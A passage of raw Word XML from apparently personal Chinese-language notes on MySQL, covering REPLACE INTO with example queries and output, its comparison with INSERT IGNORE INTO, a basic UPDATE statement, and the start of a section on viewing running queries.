        <w:t>|  2 | b    | second record         |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D1B1A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>|  3 | a    | first record replaced |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42991920" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>+----+------+-----------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0665C927" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2 rows in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E29F8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560FE1E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">/** 2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>replace into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>，唯一键已存在、但主键未指定，由数据库处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A593FAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>mysql&gt; replace into test_replace values (null, 'a', 'first record replaced 2');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEC4F2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Query OK, 2 rows affected (0.01 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A632D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F90C23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>mysql&gt; select * from test_replace;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07539719" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>+----+------+-------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD861A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>| id | code | title                   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042695F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>+----+------+-------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5753DFD9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>|  2 | b    | second record           |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BF6DBC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>|  4 | a    | first record replaced 2 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E1A056" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>+----+------+-------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD0D152" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2 rows in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FAF49A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A86B288" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C7BC52C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL replace into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>有三种形式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63482AE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1. replace into tbl_name(col_name, ...) values(...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A30548" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2. replace into tbl_name(col_name, ...) select ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230E96CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3. replace into tbl_name set col_name=value, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BB91FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>前两种形式用的多些。其中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “into” </w:t>
      </w:r>
      <w:r>
        <w:t>关键字可以省略，不过最好加上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “into”</w:t>
      </w:r>
      <w:r>
        <w:t>，这样意思更加直观。另外，对于那些没有给予值的列，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>将自动为这些列赋上默认值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DC38C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="027B0809" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句的样例如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EFEE4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>replace into t(id, update_time) values(1, now());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4395E02F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>replace into t(id, update_time) select 1, now();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C63E3E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4EC231" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>replace into 跟 insert 功能类似，不同点在于：replace into 首先尝试插入数据到表中， 1. 如果发现表中已经有此行数据（根据主键或者唯一索引判断）则先删除此行数据，然后插入新的数据。 2. 否则，直接插入新数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577C9A55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>要注意的是：插入数据的表必须有主键或者是唯一索引！否则的话，replace into 会直接插入数据，这将导致表中出现重复的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6239821F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5341D7E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>【误区】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>我一开始感觉，replace into 对于主键设置为数字自增id的数据表没有作用，但是海林告诉我，他是显性的会同步数字id 的数据。所以，只要正常同步任何一个数据表，id本来就应该都是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200456F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127D7AB0" w14:textId="3A811529" w:rsidR="001F43EC" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc159779539"/>
      <w:r w:rsidRPr="00B62BD5">
        <w:t>INSERT IGNORE INTO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="00910573" w14:textId="77777777" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47D9F74B" w14:textId="77777777" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT IGNORE INTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> REPLACE INTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都可以用来处理重复的键，但它们的行为并不完全相同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF0CDE4" w14:textId="77777777" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24176EE9" w14:textId="77777777" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE29F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>REPLACE INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在遇到重复键时，会先删除原有的行，然后插入新的行。如果你的表有其他的列并且你的插入语句没有提供这些列的值，那么这些列的值将被清除或设置为默认值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32069445" w14:textId="77777777" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4172FAAD" w14:textId="77777777" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE29F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>INSERT IGNORE INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在遇到重复键时，会忽略当前的插入操作，保留原有的行。这意味着，如果你的表有其他列并且原有行中的值并不是默认值，那么这些值将会被保留。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73078FFE" w14:textId="77777777" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="042BF89D" w14:textId="77777777" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE29F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>INSERT IGNORE INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也会忽略所有其他的错误，如数据类型不匹配等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ED63E5" w14:textId="77777777" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26515485" w14:textId="1F1E1F43" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，这两个语句虽然都可以处理重复的键，但具体应该选择哪一个，需要根据你的实际需求来决定。如果你想保留原有行的其他列的值，应该选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> INSERT IGNORE INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果你想用新行的值替换原有行的所有列的值，应该选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> REPLACE INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B156B0F" w14:textId="77777777" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1179B5D7" w14:textId="77777777" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F0D181" w14:textId="77777777" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A87C10" w14:textId="77777777" w:rsidR="00B62BD5" w:rsidRDefault="00B62BD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A813DE" w14:textId="1B214479" w:rsidR="004A473D" w:rsidRDefault="00CB7763" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc159779540"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改某列的值</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="54F5DFD7" w14:textId="77777777" w:rsidR="004A473D" w:rsidRDefault="004A473D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68CA36F2" w14:textId="77777777" w:rsidR="00996B4E" w:rsidRDefault="00996B4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>UPDATE your_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AAD59B" w14:textId="77777777" w:rsidR="00996B4E" w:rsidRDefault="00996B4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>SET your_column = 'new_value'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47637279" w14:textId="24D1602B" w:rsidR="004A473D" w:rsidRDefault="00996B4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>WHERE your_column = 'old_value';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76383CD4" w14:textId="77777777" w:rsidR="001F43EC" w:rsidRDefault="001F43EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09FF6B97" w14:textId="2838413E" w:rsidR="00033D1B" w:rsidRDefault="00033D1B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc159779541"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看正在进行查询的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="78D0F471" w14:textId="77777777" w:rsidR="00033D1B" w:rsidRDefault="00033D1B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7604CAF5" w14:textId="4130DF17" w:rsidR="00033D1B" w:rsidRDefault="00FE00E4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidRPr="00C04A8B">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://developer.aliyun.com/article/269327</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05DD682E" w14:textId="77777777" w:rsidR="00FA577F" w:rsidRDefault="00FA577F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FC1C21" w14:textId="33FA0BD5" w:rsidR="00FA577F" w:rsidRDefault="00FA577F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看一些状态：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C0573" w14:textId="2DBED354" w:rsidR="00FA577F" w:rsidRDefault="00FA577F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CED74C1" w14:textId="77777777" w:rsidR="00FA577F" w:rsidRDefault="00FA577F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ACE74A2" w14:textId="04B9F4B5" w:rsidR="005872BA" w:rsidRDefault="005872BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086B985A" w14:textId="3D00A6EF" w:rsidR="00FE00E4" w:rsidRDefault="005872BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
